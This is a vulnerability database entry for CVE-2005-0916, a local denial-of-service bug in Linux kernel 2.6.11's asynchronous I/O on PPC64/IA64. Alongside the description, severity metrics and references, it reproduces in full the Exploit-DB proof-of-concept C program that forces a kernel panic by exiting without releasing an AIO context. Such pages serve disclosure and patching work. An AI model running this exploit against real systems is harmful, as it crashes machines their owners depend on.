CVE-2005-0916 : Detail

CVE-2005-0916

0.15%V4
Local
2005-03-29
03h00 +00:00
2005-09-20
07h00 +00:00

CVE Descriptions

AIO in the Linux kernel 2.6.11 on the PPC64 or IA64 architectures with CONFIG_HUGETLB_PAGE enabled allows local users to cause a denial of service (system panic) via a process that executes the io_queue_init function but exits without running io_queue_release, which causes exit_aio and is_hugepage_only_range to fail.

CVE Information

Metrics

Metrics | Score | Severity | CVSS Vector | Source
V2 | 2.1 | | AV:L/AC:L/Au:N/C:N/I:N/A:P | nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 911

Publication date : 2005-04-03 22h00 +00:00
Author : Daniel McNeil
EDB Verified : Yes

```c
//
// Proof of Concept by Daniel McNeil
// compile using cc -o aiodio_read aiodio_read.c -laio
//
#define _XOPEN_SOURCE 600
#define _GNU_SOURCE

#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <sys/fcntl.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <libaio.h>

int pagesize;
char *iobuf;
io_context_t myctx;
int aio_maxio = 4;

/*
 * do an AIO DIO read
 */
int do_aio_direct_read(int fd, char *iobuf, int offset, int size)
{
	struct iocb myiocb;
	struct iocb *iocbp = &myiocb;
	int ret;
	struct io_event e;
	struct stat s;

	io_prep_pread(&myiocb, fd, iobuf, size, offset);
	if ((ret = io_submit(myctx, 1, &iocbp)) != 1) {
		perror("io_submit");
		return ret;
	}

	ret = io_getevents(myctx, 1, 1, &e, 0);

	if (ret) {
		struct iocb *iocb = e.obj;
		int iosize = iocb->u.c.nbytes;
		char *buf = iocb->u.c.buf;
		long long loffset = iocb->u.c.offset;

		printf("AIO read of %d at offset %lld returned %d\n",
			iosize, loffset, e.res);
	}

	return ret;
}

int main(int argc, char *argv[])
{
	char *filename;
	int fd;
	int err;

	filename = "test.aio.file";
	fd = open(filename, O_RDWR|O_DIRECT|O_CREAT|O_TRUNC, 0666);

	pagesize = getpagesize();
	err = posix_memalign((void**) &iobuf, pagesize, pagesize);
	if (err) {
		fprintf(stderr, "Error allocating %d aligned bytes.\n", pagesize);
		exit(1);
	}
	err = write(fd, iobuf, pagesize);
	if (err != pagesize) {
		fprintf(stderr, "Error ret = %d writing %d bytes.\n", err, pagesize);
		perror("");
		exit(1);
	}

	memset(&myctx, 0, sizeof(myctx));
	io_queue_init(aio_maxio, &myctx);
	err = do_aio_direct_read(fd, iobuf, 0, pagesize);
	close(fd);

	/* exits without calling io_queue_release() */
	printf("This will panic on ppc64\n");
	return err;
}

// milw0rm.com [2005-04-04]
```

Products Mentioned

Configuration 0

Linux>>Linux_kernel >> Version 2.6.11

References

http://www.securityfocus.com/bid/12987
Tags : vdb-entry, x_refsource_BID